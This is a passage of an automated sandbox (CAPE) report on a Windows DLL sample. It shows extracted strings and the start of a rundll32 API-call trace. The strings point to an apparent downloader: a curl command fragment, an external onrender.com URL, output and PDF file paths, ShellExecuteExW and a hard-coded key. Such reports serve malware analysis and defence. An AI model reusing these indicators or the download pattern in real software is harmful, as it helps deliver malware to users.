".idata$2",
"api-ms-win-crt-stdio-l1-1-0.dll",
"string too long",
"??1_Lockit@std@@QAE@XZ",
".?AV?$basic_streambuf@DU?$char_traits@D@std@@@std@@",
"364E4`4t4y4",
"3'4B4K4Q4!5+5Y5d5",
"1@2\\2",
";,=9>G>Z>`>",
"C:\\Users\\lengo\\Desktop\\Spamming Work\\Duy\\PyApp\\workplace\\curl\\Dll1\\Release\\Dll1.pdb",
"ycurl.exe -L -s -A \"curl\" \"",
"\\zip\\",
"GD$ P",
"fputc",
"https://githostaduviep-g550.onrender.com",
"?id@?$codecvt@DDU_Mbstatet@@@std@@2V0locale@2@A",
"/output.txt",
"CoInitialize",
"5&5f5u5",
"<8<E<",
"ShellExecuteExW",
".text$mn",
"@.reloc",
"api-ms-win-crt-runtime-l1-1-0.dll",
"?_Xlength_error@std@@YAXPBD@Z",
"w\"VPS",
"fgetpos",
"__CxxFrameHandler3",
"1-131=1C1L1R1Z1_1s1x1",
"7$7,747P7p7|7",
"CoCreateInstance",
"?showmanyc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MAE_JXZ",
".?AV?$basic_stringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@",
"2,3d3",
"/pdf.pdf",
"=!>'>1>7>",
"?sync@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MAEHXZ",
"memmove",
".idata$3",
".idata$4",
"343g3",
"? ?8?<?@?D?H?L?P?T?X?\\?p?",
"_seh_filter_dll",
"1 181<1@1D1H1L1`1d1|1",
"jjjjj",
"-030<0E0N0T0Z0o0x0",
"api-ms-win-crt-convert-l1-1-0.dll",
"u&PPPPP",
"TerminateProcess",
".rsrc",
"j$X9E",
"GetSystemTimeAsFileTime",
"!This program cannot be run in DOS mode.",
"</assembly>",
"6>6[6",
"fsetpos",
".rtc$TAA",
".data$rs",
"GetExitCodeProcess",
"CloseHandle",
"??7ios_base@std@@QBE_NXZ",
".text$di",
"2>2d2",
".rsrc$01",
"_wstat64i32",
"`.rdata",
"CreateDirectoryW",
".?AV?$basic_filebuf@DU?$char_traits@D@std@@@std@@",
"u(PPPPP",
".?AVbad_cast@std@@",
"1(1x1",
"<<=L=",
".data",
"_initterm_e",
"WinHttpSendRequest",
"<assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'>",
"=$=(=@=P=T=X=`=d=l=",
"?_Xout_of_range@std@@YAXPBD@Z",
":&:;:\\:n:",
":7;T;",
"mysecretkey",
"bad array new length",
"_lock_file",
".xdata$x",
"_crt_atexit",
"?_Id_cnt@id@locale@std@@0HA",
"u'PPPPP"
],
"virustotal": {
"error": true,
"msg": "Unable to complete connection to VirusTotal. Status code: 429"
},
"cape_type_code": 0,
"cape_type": ""
}
}
|
{
"payloads": [],
"configs": []
}
|
{
"version": "2.4-CAPE",
"started": "2025-11-15 08:47:33",
"ended": "2025-11-15 08:52:15",
"duration": 282,
"id": 10,
"category": "file",
"custom": "",
"machine": {
"id": 10,
"status": "stopping",
"name": "win10",
"label": "win10",
"platform": "windows",
"manager": "KVM",
"started_on": "2025-11-15 08:47:33",
"shutdown_on": "2025-11-15 08:52:07"
},
"package": "dll",
"timeout": true,
"tlp": null,
"parent_sample": null,
"options": {},
"source_url": null,
"route": "none",
"user_id": 0,
"CAPE_current_commit": "9cf8bf5a0ee601c0afc7068413c59a1049674c64"
}
|
{
"processes": [
{
"process_id": 1052,
"process_name": "rundll32.exe",
"parent_id": 7528,
"module_path": "C:\\Windows\\SysWOW64\\rundll32.exe",
"first_seen": "2025-11-15 16:47:15,873",
"calls": [
{
"timestamp": "2025-11-15 16:47:16,263",
"thread_id": "3260",
"caller": "0x76065c5a",
"parentcaller": "0x76b44cce",
"category": "process",
"api": "NtProtectVirtualMemory",
"status": true,
"return": "0x00000000",
"arguments": [
{
"name": "ProcessHandle",
"value": "0xffffffff"
},
{
"name": "BaseAddress",
"value": "0x76b55000"
},
{
"name": "ModuleName",
"value": "imagehlp.dll"
},
{
"name": "NumberOfBytesProtected",
"value": "0x00002000"
},
{
"name": "MemoryType",
"value": "0x00000000"
},
{
"name": "NewAccessProtection",
"value": "0x00000004",
"pretty_value": "PAGE_READWRITE"
},
{
"name": "OldAccessProtection",
"value": "0x00000002",
"pretty_value": "PAGE_READONLY"
},
{
"name": "StackPivoted",
"value": "no"
}
],
"repeated": 0,
"id": 0
},
{
"timestamp": "2025-11-15 16:47:16,263",
"thread_id": "3260",
"caller": "0x7604fbba",
"parentcaller": "0x76b44c2c",
"category": "system",
"api": "LdrGetProcedureAddressForCaller",
"status": true,
"return": "0x00000000",
"arguments": [
{
"name": "ModuleName",
"value": "KERNEL32.DLL"
},
{
"name": "ModuleHandle",
"value": "0x76330000"
},
{
"name": "FunctionName",
"value": "GetThreadContext"
},
{
"name": "Ordinal",
"value": "0"
},
{
"name": "FunctionAddress",
"value": "0x76364c50"
}
],
"repeated": 0,
"id": 1
},
{
"timestamp": "2025-11-15 16:47:16,263",
"thread_id": "3260",
"caller": "0x7604fbba",
"parentcaller": "0x76b44c2c",
"category": "system",
"api": "LdrGetProcedureAddressForCaller",
"status": true,
"return": "0x00000000",
"arguments": [
{
"name": "ModuleName",
"value": "KERNEL32.DLL"
},
{
"name": "ModuleHandle",
"value": "0x76330000"
},
{
"name": "FunctionName",
"value": "GetThreadTimes"
},
{
"name": "Ordinal",
"value": "0"
},
{
"name": "FunctionAddress",
"value": "0x76352610"
}
],
"repeated": 0,
"id": 2
},
{
"timestamp": "2025-11-15 16:47:16,263",
"thread_id": "3260",
"caller": "0x7604fbba",
"parentcaller": "0x76b44c2c",
"category": "system",
"api": "LdrGetProcedureAddressForCaller",
"status": true,
"return": "0x00000000",
"arguments": [
{
"name": "ModuleName",
"value": "KERNEL32.DLL"
},
{
"name": "ModuleHandle",
"value": "0x76330000"
},
{
"name": "FunctionName",
"value": "IsProcessorFeaturePresent"
},
{
"name": "Ordinal",
"value": "0"
},
{
"name": "FunctionAddress",
"value": "0x76351210"
}
],
"repeated": 0,
"id": 3
},
{
"timestamp": "2025-11-15 16:47:16,263",
"thread_id": "3260",
"caller": "0x7604fbba",
"parentcaller": "0x76b44c2c",
"category": "system",
"api": "LdrGetProcedureAddressForCaller",
"status": true,
"return": "0x00000000",
"arguments": [
{
"name": "ModuleName",
"value": "KERNEL32.DLL"
},
{
"name": "ModuleHandle",
"value": "0x76330000"
},
{
"name": "FunctionName",
"value": "OpenThread"
},
{
"name": "Ordinal",
"value": "0"
},
{
"name": "FunctionAddress",
"value": "0x7634fbe0"
}
],
"repeated": 0,
"id": 4
},
{
"timestamp": "2025-11-15 16:47:16,263",
"thread_id": "3260",
"caller": "0x7604fbba",
"parentcaller": "0x76b44c2c",
"category": "system",
"api": "LdrGetProcedureAddressForCaller",
"status": true,
"return": "0x00000000",
"arguments": [
{
"name": "ModuleName",
"value": "KERNEL32.DLL"
},
{
"name": "ModuleHandle",
"value": "0x76330000"
},
{
"name": "FunctionName",
"value": "ProcessIdToSessionId"
},
{
"name": "Ordinal",
"value": "0"
},
{
"name": "FunctionAddress",
"value": "0x76351230"
}
],
"repeated": 0,
"id": 5
},
{
"timestamp": "2025-11-15 16:47:16,263",
"thread_id": "3260",
"caller": "0x7604fbba",
"parentcaller": "0x76b44c2c",
"category": "system",
"api": "LdrGetProcedureAddressForCaller",
"status": true,
"return": "0x00000000",
"arguments": [
{
"name": "ModuleName",
"value": "KERNEL32.DLL"
},
{
"name": "ModuleHandle",
"value": "0x76330000"
},
{
"name": "FunctionName",
"value": "SetProcessShutdownParameters"
},
{
"name": "Ordinal",
"value": "0"
},
{
"name": "FunctionAddress",
"value": "0x76349540"
}
],
"repeated": 0,
"id": 6
},
{
"timestamp": "2025-11-15 16:47:16,263",
"thread_id": "3260",
"caller": "0x7604fbba",
"parentcaller": "0x76b44c2c",
"category": "system",
"api": "LdrGetProcedureAddressForCaller",
"status": true,
"return": "0x00000000",
"arguments": [
{
"name": "ModuleName",
"value": "KERNEL32.DLL"
},
{
"name": "ModuleHandle",
"value": "0x76330000"
},
{
"name": "FunctionName",
"value": "SetThreadContext"
},
{
"name": "Ordinal",
"value": "0"
},
{
"name": "FunctionAddress",
"value": "0x763660a0"
}
],
"repeated": 0,
"id": 7
},
{
"timestamp": "2025-11-15 16:47:16,263",
"thread_id": "3260",
"caller": "0x7604fbba",
"parentcaller": "0x76b44c2c",
"category": "system",
"api": "LdrGetProcedureAddressForCaller",
"status": true,
"return": "0x00000000",
"arguments": [
{
"name": "ModuleName",
"value": "KERNEL32.DLL"
},
{
"name": "ModuleHandle",
"value": "0x76330000"
},
{
"name": "FunctionName",
"value": "GetProcessId"
},
{
"name": "Ordinal",
"value": "0"
},
{
"name": "FunctionAddress",
"value": "0x763512c0"
}
],
"repeated": 0,
"id": 8
},
{
"timestamp": "2025-11-15 16:47:16,263",
"thread_id": "3260",
"caller": "0x76065c5a",
"parentcaller": "0x76b44d2f",
"category": "process",
"api": "NtProtectVirtualMemory",
"status": true,
"return": "0x00000000",
"arguments": [
{
"name": "ProcessHandle",
"value": "0xffffffff"
},
{
"name": "BaseAddress",
"value": "0x76b55000"
},
{
"name": "ModuleName",
"value": "imagehlp.dll"
},
{
"name": "NumberOfBytesProtected",
"value": "0x00002000"
},
{
"name": "MemoryType",
"value": "0x00000000"
},
{
"name": "NewAccessProtection",
"value": "0x00000002",
"pretty_value": "PAGE_READONLY"
},
{
"name": "OldAccessProtection",
"value": "0x00000004",
"pretty_value": "PAGE_READWRITE"
},
{
"name": "StackPivoted",
"value": "no"
}
],
"repeated": 0,
"id": 9
},
{
"timestamp": "2025-11-15 16:47:16,263",
"thread_id": "3260",
"caller": "0x76065c5a",
"parentcaller": "0x76b44cce",
"category": "process",
"api": "NtProtectVirtualMemory",
"status": true,
"return": "0x00000000",
"arguments": [
{
"name": "ProcessHandle",
"value": "0xffffffff"
},
{
"name": "BaseAddress",
"value": "0x76b55000"
},
{
"name": "ModuleName",
"value": "imagehlp.dll"
},
{
"name": "NumberOfBytesProtected",
"value": "0x00002000"
},
{
"name": "MemoryType",
"value": "0x00000000"
},
{
"name": "NewAccessProtection",
"value": "0x00000004",
"pretty_value": "PAGE_READWRITE"
},
{
"name": "OldAccessProtection",
"value": "0x00000002",
"pretty_value": "PAGE_READONLY"
},
{
"name": "StackPivoted",
"value": "no"
}
],
"repeated": 0,
"id": 10
},
{
"timestamp": "2025-11-15 16:47:16,263",
"thread_id": "3260",
"caller": "0x76065c5a",
"parentcaller": "0x76b44d2f",
"category": "process",
"api": "NtProtectVirtualMemory",
"status": true,
"return": "0x00000000",
"arguments": [
{
"name": "ProcessHandle",
"value": "0xffffffff"
},
{
"name": "BaseAddress",
"value": "0x76b55000"
},
{
"name": "ModuleName",
"value": "imagehlp.dll"
},
{
"name": "NumberOfBytesProtected",
"value": "0x00002000"
},
{
"name": "MemoryType",
"value": "0x00000000"
},
{
"name": "NewAccessProtection",
"value": "0x00000002",
"pretty_value": "PAGE_READONLY"
},
{
"name": "OldAccessProtection",
"value": "0x00000004",
"pretty_value": "PAGE_READWRITE"
},
{
"name": "StackPivoted",
"value": "no"
}
],
"repeated": 0,
"id": 11
},
{
"timestamp": "2025-11-15 16:47:16,263",
"thread_id": "3260",
"caller": "0x779f002d",
"parentcaller": "0x7604c93d",
"category": "system",
"api": "NtQueryLicenseValue",
"status": true,
"return": "0x00000000",
"arguments": [
{
"name": "Name",
"value": "TerminalServices-RemoteConnectionManager-AllowAppServerMode"
},
{
"name": "Type",
"value": "0x00000004"
}
],
"repeated": 0,
"id": 12
},
{
"timestamp": "2025-11-15 16:47:16,263",
"thread_id": "3260",
"caller": "0x779f002d",
"parentcaller": "0x7604c93d",
"category": "system",
"api": "LdrpCallInitRoutine",
"status": true,
"return": "0x00000001",
"arguments": [
{
"name": "MappedPath",
"value": "\\Device\\HarddiskVolume2\\Windows\\SysWOW64\\imagehlp"
},
{
"name": "BaseAddress",
"value": "0x76b40000"
},
{
"name": "InitRoutine",
"value": "0x76b46560"
},
{
"name": "Reason",
"value": "1"
}
],
"repeated": 0,
"id": 13
},
{
"timestamp": "2025-11-15 16:47:16,263",
"thread_id": "3260",
"caller": "0x77a264c6",
"parentcaller": "0x77a263d1",
"category": "threading",
"api": "NtTestAlert",
"status": true,
"return": "0x00000000",
"arguments": [],
"repeated": 1,
"id": 14
},
{
"timestamp": "2025-11-15 16:47:16,279",
"thread_id": "7476",
"caller": "0x77a11bae",
"parentcaller": "0x77a0db51",
"category": "system",
"api": "NtWaitForSingleObject",
"status": true,
"return": "0x00000000",
"arguments": [
{
"name": "Handle",
"value": "0x0000007c"
},
{
"name": "Milliseconds",
"value": "18446744073709551615"
},
{
"name": "Status",
"value": "Infinite"
}
],
"repeated": 2,
"id": 15
},
{
"timestamp": "2025-11-15 16:47:16,279",
"thread_id": "7476",
"caller": "0x77a264c6",
"parentcaller": "0x77a263d1",
"category": "threading",
"api": "NtTestAlert",
"status": true,
"return": "0x00000000",
"arguments": [],
"repeated": 2,
"id": 16
},
{
"timestamp": "2025-11-15 16:47:16,279",
"thread_id": "3260",
"caller": "0x00965f1a",
"parentcaller": "0x00965fdd",
"category": "process",
"api": "NtAllocateVirtualMemory",
"status": true,
"return": "0x00000000",
"arguments": [
{
"name": "ProcessHandle",
"value": "0xffffffff"
},
{
"name": "BaseAddress",
"value": "0x00863000"
},
{
"name": "RegionSize",
"value": "0x00001000"
},
{
"name": "Protection",
"value": "0x00000004",
"pretty_value": "PAGE_READWRITE"
},
{
"name": "StackPivoted",
"value": "no"
}
],
"repeated": 0,
"id": 17
},
{
"timestamp": "2025-11-15 16:47:16,279",
"thread_id": "3260",
"caller": "0x00965f1a",
"parentcaller": "0x00965fdd",
"category": "process",
"api": "NtAllocateVirtualMemory",
"status": true,
"return": "0x00000000",
"arguments": [
{
"name": "ProcessHandle",
"value": "0xffffffff"
},
{
"name": "BaseAddress",
"value": "0x00864000"
},
{
"name": "RegionSize",
"value": "0x00001000"
},
{
"name": "Protection",
"value": "0x00000004",
"pretty_value": "PAGE_READWRITE"
},
{
"name": "StackPivoted",
"value": "no"
}
],
"repeated": 0,
"id": 18
},
{
"timestamp": "2025-11-15 16:47:16,279",
"thread_id": "3260",
"caller": "0x00964168",
"parentcaller": "0x00966078",
"category": "process",
"api": "NtSetInformationProcess",
"status": true,
"return": "0x00000000",
"arguments": [
{
"name": "ProcessInformationClass",
"value": "34",
"pretty_value": "ProcessExecuteFlags"
},
{
"name": "ProcessInformation",
"value": "1"
}
],
"repeated": 0,
"id": 19
},
{
"timestamp": "2025-11-15 16:47:16,279",
"thread_id": "3260",
"caller": "0x009640d8",
"parentcaller": "0x009641fe",
"category": "misc",
"api": "NtQuerySystemInformation",
"status": true,
"return": "0x00000000",
"arguments": [
{
"name": "SystemInformationClass",
"value": "164"
}
],
"repeated": 0,
"id": 20
},
{
"timestamp": "2025-11-15 16:47:16,279",
"thread_id": "3260",
"caller": "0x00964290",
"parentcaller": "0x00966078",
"category": "process",
"api": "NtSetInformationProcess",
"status": true,
"return": "0x00000000",
"arguments": [
{
"name": "ProcessInformationClass",
"value": "12"
},
{
"name": "ProcessInformation",
"value": "\\x00\\x80\\x00\\x00"
}
],
"repeated": 0,
"id": 21
},
{
"timestamp": "2025-11-15 16:47:16,279",
"thread_id": "3260",
"caller": "0x009659c5",
"parentcaller": "0x009642a3",
"category": "filesystem",
"api": "NtQueryAttributesFile",
"status": false,
"return": "0xffffffffc0000034",
"pretty_return": "OBJECT_NAME_NOT_FOUND",
"arguments": [
{
"name": "FileName",
"value": "C:\\Users\\apogean\\AppData\\Local\\Temp\\cf9cdd5d26283d31c43e.dll.manifest"
}
],
"repeated": 0,
"id": 22
},
{
"timestamp": "2025-11-15 16:47:16,279",
"thread_id": "3260",
"caller": "0x00965a1d",
"parentcaller": "0x009642a3",
"category": "filesystem",
"api": "NtOpenFile",
"status": true,
"return": "0x00000000",
"arguments": [
{
"name": "FileHandle",
"value": "0x000002a8"
},
{
"name": "DesiredAccess",
"value": "0x001200a9",
"pretty_value": "FILE_GENERIC_READ|FILE_GENERIC_EXECUTE"
},
{
"name": "FileName",
"value": "C:\\Users\\apogean\\AppData\\Local\\Temp\\cf9cdd5d26283d31c43e.dll"
},
{
"name": "ShareAccess",
"value": "5",
"pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE"
}
],
"repeated": 0,
"id": 23
},
{
"timestamp": "2025-11-15 16:47:16,279",
"thread_id": "3260",
"caller": "0x00965a1d",
"parentcaller": "0x009642a3",
"category": "process",
"api": "NtCreateSection",
"status": true,
"return": "0x00000000",
"arguments": [
{
"name": "SectionHandle",
"value": "0x000002a4"
},
{
"name": "DesiredAccess",
"value": "0x00000004",
"pretty_value": "SECTION_MAP_READ"
},
{
"name": "ObjectAttributes",
"value": ""
},
{
"name": "FileHandle",
"value": "0x000002a8"
},
{
"name": "FileName",
"value": "C:\\Users\\apogean\\AppData\\Local\\Temp\\cf9cdd5d26283d31c43e.dll"
}
],
"repeated": 0,
"id": 24
},
{
"timestamp": "2025-11-15 16:47:16,279",
"thread_id": "3260",
"caller": "0x00965a1d",
"parentcaller": "0x009642a3",
"category": "process",
"api": "NtMapViewOfSection",
"status": true,
"return": "0x40000003",
"arguments": [
{
"name": "SectionHandle",
"value": "0x000002a4"
},
{
"name": "ProcessHandle",
"value": "0xffffffff"
},
{
"name": "BaseAddress",
"value": "0x00930000"
},
{
"name": "SectionOffset",
"value": "0x00000000"
},
{
"name": "ViewSize",
"value": "0x00010000"
},
{
"name": "Win32Protect",
"value": "0x00000002",
"pretty_value": "PAGE_READONLY"
},
{
"name": "StackPivoted",
"value": "no"
}
],
"repeated": 0,
"id": 25
},
{
"timestamp": "2025-11-15 16:47:16,279",
"thread_id": "3260",
"caller": "0x00965a1d",
"parentcaller": "0x009642a3",
"category": "registry",
"api": "NtOpenKey",
"status": true,
"return": "0x00000000",
"arguments": [
{
"name": "KeyHandle",
"value": "0x000002a0"
},
{
"name": "DesiredAccess",
"value": "0x00020019",
"pretty_value": "KEY_READ"
},
{
"name": "ObjectAttributesHandle",
"value": "0x00000000"
},
{
"name": "ObjectAttributesName",
"value": "\\Registry\\MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\SideBySide"
},
{
"name": "ObjectAttributes",
"value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\SideBySide"
}
],
"repeated": 0,
"id": 26
},
{
"timestamp": "2025-11-15 16:47:16,279",
"thread_id": "3260",
"caller": "0x00965a1d",
"parentcaller": "0x009642a3",
"category": "registry",
"api": "NtQueryValueKey",
"status": false,
"return": "0xffffffffc0000034",
"pretty_return": "OBJECT_NAME_NOT_FOUND",
"arguments": [
{
"name": "KeyHandle",
"value": "0x000002a0"
},
{
"name": "ValueName",
"value": "PreferExternalManifest"
},
{
"name": "FullName",
"value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\SideBySide\\PreferExternalManifest"
}
],
"repeated": 0,
"id": 27
},
{
"timestamp": "2025-11-15 16:47:16,279",
"thread_id": "3260",
"caller": "0x00965a1d",
"parentcaller": "0x009642a3",
"category": "system",
"api": "NtClose",
"status": true,
"return": "0x00000000",
"arguments": [
{
"name": "Handle",
"value": "0x000002a0"
}
],
"repeated": 0,
"id": 28
},
{
"timestamp": "2025-11-15 16:47:16,279",
"thread_id": "3260",
"caller": "0x00965a1d",
"parentcaller": "0x009642a3",
"category": "filesystem",
"api": "NtOpenFile",
"status": false,
"return": "0xffffffffc0000034",
"pretty_return": "OBJECT_NAME_NOT_FOUND",
"arguments": [
{
"name": "FileHandle",
"value": "0x00000000"
},
{
"name": "DesiredAccess",
"value": "0x001200a9",
"pretty_value": "FILE_GENERIC_READ|FILE_GENERIC_EXECUTE"
},
{
"name": "FileName",
"value": "C:\\Users\\apogean\\AppData\\Local\\Temp\\cf9cdd5d26283d31c43e.dll.123.Manifest"
},
{
"name": "ShareAccess",
"value": "5",
"pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE"
}
],
"repeated": 0,
"id": 29
},
{
"timestamp": "2025-11-15 16:47:16,279",
"thread_id": "3260",
"caller": "0x00965a1d",
"parentcaller": "0x009642a3",
"category": "system",
"api": "NtClose",
"status": true,
"return": "0x00000000",
"arguments": [
{
"name": "Handle",
"value": "0x000002a8"
}
],
"repeated": 0,
"id": 30
},
{
"timestamp": "2025-11-15 16:47:16,279",
"thread_id": "3260",
"caller": "0x00965a1d",
"parentcaller": "0x009642a3",
"category": "system",
"api": "NtClose",
"status": true,
"return": "0x00000000",
"arguments": [
{
"name": "Handle",
"value": "0x000002a4"
}
],
"repeated": 0,
"id": 31
},
{
"timestamp": "2025-11-15 16:47:16,279",
"thread_id": "3260",
"caller": "0x00965a1d",
"parentcaller": "0x009642a3",
"category": "process",
"api": "NtUnmapViewOfSection",
"status": true,
"return": "0x00000000",
"arguments": [
{
"name": "ProcessHandle",
"value": "0xffffffff"
},
{
"name": "BaseAddress",
"value": "0x00930000"
},
{
"name": "RegionSize",
"value": "0x00010000"
}
],
"repeated": 0,
"id": 32
},
{
"timestamp": "2025-11-15 16:47:16,279",
"thread_id": "3260",
"caller": "0x00965a3e",
"parentcaller": "0x009642a3",
"category": "filesystem",
"api": "NtOpenFile",
"status": true,
"return": "0x00000000",
"arguments": [
{
"name": "FileHandle",
"value": "0x000002a4"
},
{
"name": "DesiredAccess",
"value": "0x001200a9",
"pretty_value": "FILE_GENERIC_READ|FILE_GENERIC_EXECUTE"
},
{
"name": "FileName",
"value": "C:\\Users\\apogean\\AppData\\Local\\Temp\\cf9cdd5d26283d31c43e.dll"
},
{
"name": "ShareAccess",
"value": "5",
"pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE"
}
],
"repeated": 0,
"id": 33
},
{
"timestamp": "2025-11-15 16:47:16,279",
"thread_id": "3260",
"caller": "0x00965a3e",
"parentcaller": "0x009642a3",
"category": "process",
"api": "NtCreateSection",
"status": true,
"return": "0x00000000",
"arguments": [
{
"name": "SectionHandle",
"value": "0x000002a8"
},
{
"name": "DesiredAccess",
"value": "0x00000004",
"pretty_value": "SECTION_MAP_READ"
},
{
"name": "ObjectAttributes",
"value": ""
},
{
"name": "FileHandle",
"value": "0x000002a4"
},
{
"name": "FileName",
"value": "C:\\Users\\apogean\\AppData\\Local\\Temp\\cf9cdd5d26283d31c43e.dll"
}
],
"repeated": 0,
"id": 34
},
{
"timestamp": "2025-11-15 16:47:16,279",
"thread_id": "3260",
"caller": "0x00965a3e",
"parentcaller": "0x009642a3",
"category": "process",
"api": "NtMapViewOfSection",
"status": true,
"return": "0x40000003",
"arguments": [
{
"name": "SectionHandle",
"value": "0x000002a8"
},
{
"name": "ProcessHandle",
"value": "0xffffffff"
},
{
"name": "BaseAddress",
"value": "0x00930000"
},
{
"name": "SectionOffset",
"value": "0x00000000"
},
{
"name": "ViewSize",
"value": "0x00010000"
},
{
"name": "Win32Protect",
"value": "0x00000002",
"pretty_value": "PAGE_READONLY"
},
{
"name": "StackPivoted",
"value": "no"
}
],
"repeated": 0,
"id": 35
},
{
"timestamp": "2025-11-15 16:47:16,279",
"thread_id": "3260",
"caller": "0x00965a3e",
"parentcaller": "0x009642a3",
"category": "registry",
"api": "NtOpenKey",
"status": true,
"return": "0x00000000",
"arguments": [
{
"name": "KeyHandle",
"value": "0x000002a0"
},
{
"name": "DesiredAccess",
"value": "0x00020019",
"pretty_value": "KEY_READ"
},
{
"name": "ObjectAttributesHandle",
"value": "0x00000000"
},
{
"name": "ObjectAttributesName",
"value": "\\Registry\\MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\SideBySide"
},
{
"name": "ObjectAttributes",
"value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\SideBySide"
}
],
"repeated": 0,
"id": 36
},
{
"timestamp": "2025-11-15 16:47:16,279",
"thread_id": "3260",
"caller": "0x00965a3e",
"parentcaller": "0x009642a3",
"category": "registry",
"api": "NtQueryValueKey",
"status": false,
"return": "0xffffffffc0000034",
"pretty_return": "OBJECT_NAME_NOT_FOUND",
"arguments": [
{
"name": "KeyHandle",
"value": "0x000002a0"
},
{
"name": "ValueName",
"value": "PreferExternalManifest"
},
{
"name": "FullName",
"value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\SideBySide\\PreferExternalManifest"
}
],
"repeated": 0,
"id": 37
},
{
"timestamp": "2025-11-15 16:47:16,279",
"thread_id": "3260",
"caller": "0x00965a3e",
"parentcaller": "0x009642a3",
"category": "system",
"api": "NtClose",
"status": true,
"return": "0x00000000",
"arguments": [
{
"name": "Handle",
"value": "0x000002a0"
}
],
"repeated": 0,
"id": 38
},
{
"timestamp": "2025-11-15 16:47:16,279",
"thread_id": "3260",
"caller": "0x00965a3e",
"parentcaller": "0x009642a3",
"category": "filesystem",
"api": "NtOpenFile",
"status": false,
"return": "0xffffffffc0000034",
"pretty_return": "OBJECT_NAME_NOT_FOUND",
"arguments": [
{
"name": "FileHandle",
"value": "0x00000000"
},
{
"name": "DesiredAccess",
"value": "0x001200a9",
"pretty_value": "FILE_GENERIC_READ|FILE_GENERIC_EXECUTE"
},
{
"name": "FileName",
"value": "C:\\Users\\apogean\\AppData\\Local\\Temp\\cf9cdd5d26283d31c43e.dll.124.Manifest"
},
{
"name": "ShareAccess",
"value": "5",
"pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE"
}
],
"repeated": 0,
"id": 39
},
{
"timestamp": "2025-11-15 16:47:16,295",
"thread_id": "3260",
"caller": "0x00965a3e",
"parentcaller": "0x009642a3",
"category": "system",
"api": "NtClose",
"status": true,
"return": "0x00000000",
"arguments": [
{
"name": "Handle",
"value": "0x000002a4"
}
],
"repeated": 0,
"id": 40
},
{
"timestamp": "2025-11-15 16:47:16,295",
"thread_id": "3260",
"caller": "0x00965a3e",
"parentcaller": "0x009642a3",
"category": "system",
"api": "NtClose",
"status": true,
"return": "0x00000000",
"arguments": [
{
"name": "Handle",
"value": "0x000002a8"
}
],
"repeated": 0,
"id": 41
},
{
"timestamp": "2025-11-15 16:47:16,295",
"thread_id": "3260",
"caller": "0x00965a3e",
"parentcaller": "0x009642a3",
"category": "process",
"api": "NtUnmapViewOfSection",
"status": true,
"return": "0x00000000",
"arguments": [
{
"name": "ProcessHandle",
"value": "0xffffffff"
},
{
"name": "BaseAddress",
"value": "0x00930000"
},
{
"name": "RegionSize",
"value": "0x00010000"
}
],
"repeated": 0,
"id": 42
},
{
"timestamp": "2025-11-15 16:47:16,295",
"thread_id": "3260",
"caller": "0x00965a5f",
"parentcaller": "0x009642a3",
"category": "filesystem",
"api": "NtOpenFile",
"status": true,
"return": "0x00000000",
"arguments": [
{
"name": "FileHandle",
"value": "0x000002a8"
},
{
"name": "DesiredAccess",
"value": "0x001200a9",
"pretty_value": "FILE_GENERIC_READ|FILE_GENERIC_EXECUTE"
},
{
"name": "FileName",
"value": "C:\\Users\\apogean\\AppData\\Local\\Temp\\cf9cdd5d26283d31c43e.dll"
},
{
"name": "ShareAccess",
"value": "5",
"pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE"
}
],
"repeated": 0,
"id": 43
},
{
"timestamp": "2025-11-15 16:47:16,295",
"thread_id": "3260",
"caller": "0x00965a5f",
"parentcaller": "0x009642a3",
"category": "process",
"api": "NtCreateSection",
"status": true,
"return": "0x00000000",
"arguments": [
{
"name": "SectionHandle",
"value": "0x000002a4"
},
{
"name": "DesiredAccess",
"value": "0x00000004",
"pretty_value": "SECTION_MAP_READ"
},
{
"name": "ObjectAttributes",
"value": ""
},
{
"name": "FileHandle",
"value": "0x000002a8"
},
{
"name": "FileName",
"value": "C:\\Users\\apogean\\AppData\\Local\\Temp\\cf9cdd5d26283d31c43e.dll"
}
],
"repeated": 0,
"id": 44
},
{
"timestamp": "2025-11-15 16:47:16,295",
"thread_id": "3260",
"caller": "0x00965a5f",
"parentcaller": "0x009642a3",
"category": "process",
"api": "NtMapViewOfSection",
"status": true,
"return": "0x40000003",
"arguments": [
{
"name": "SectionHandle",
"value": "0x000002a4"
},
{
"name": "ProcessHandle",
"value": "0xffffffff"
},
{
"name": "BaseAddress",
"value": "0x00930000"
},
{
"name": "SectionOffset",
"value": "0x00000000"
},
{
"name": "ViewSize",
"value": "0x00010000"
},
{
"name": "Win32Protect",
"value": "0x00000002",
"pretty_value": "PAGE_READONLY"
},
{
"name": "StackPivoted",
"value": "no"
}
],
"repeated": 0,
"id": 45
},
{
"timestamp": "2025-11-15 16:47:16,295",
"thread_id": "3260",
"caller": "0x00965a5f",
"parentcaller": "0x009642a3",
"category": "registry",
"api": "NtOpenKey",
"status": true,
"return": "0x00000000",
"arguments": [
{
"name": "KeyHandle",
"value": "0x000002a0"
},
{
"name": "DesiredAccess",
"value": "0x00020019",
"pretty_value": "KEY_READ"
},
{
"name": "ObjectAttributesHandle",
"value": "0x00000000"
},
{
"name": "ObjectAttributesName",
"value": "\\Registry\\MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\SideBySide"
},
{
"name": "ObjectAttributes",
"value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\SideBySide"
}
],
"repeated": 0,
"id": 46
},
{
"timestamp": "2025-11-15 16:47:16,295",
"thread_id": "3260",
"caller": "0x00965a5f",
"parentcaller": "0x009642a3",
"category": "registry",
"api": "NtQueryValueKey",
"status": false,
"return": "0xffffffffc0000034",
"pretty_return": "OBJECT_NAME_NOT_FOUND",
"arguments": [
{
"name": "KeyHandle",
"value": "0x000002a0"
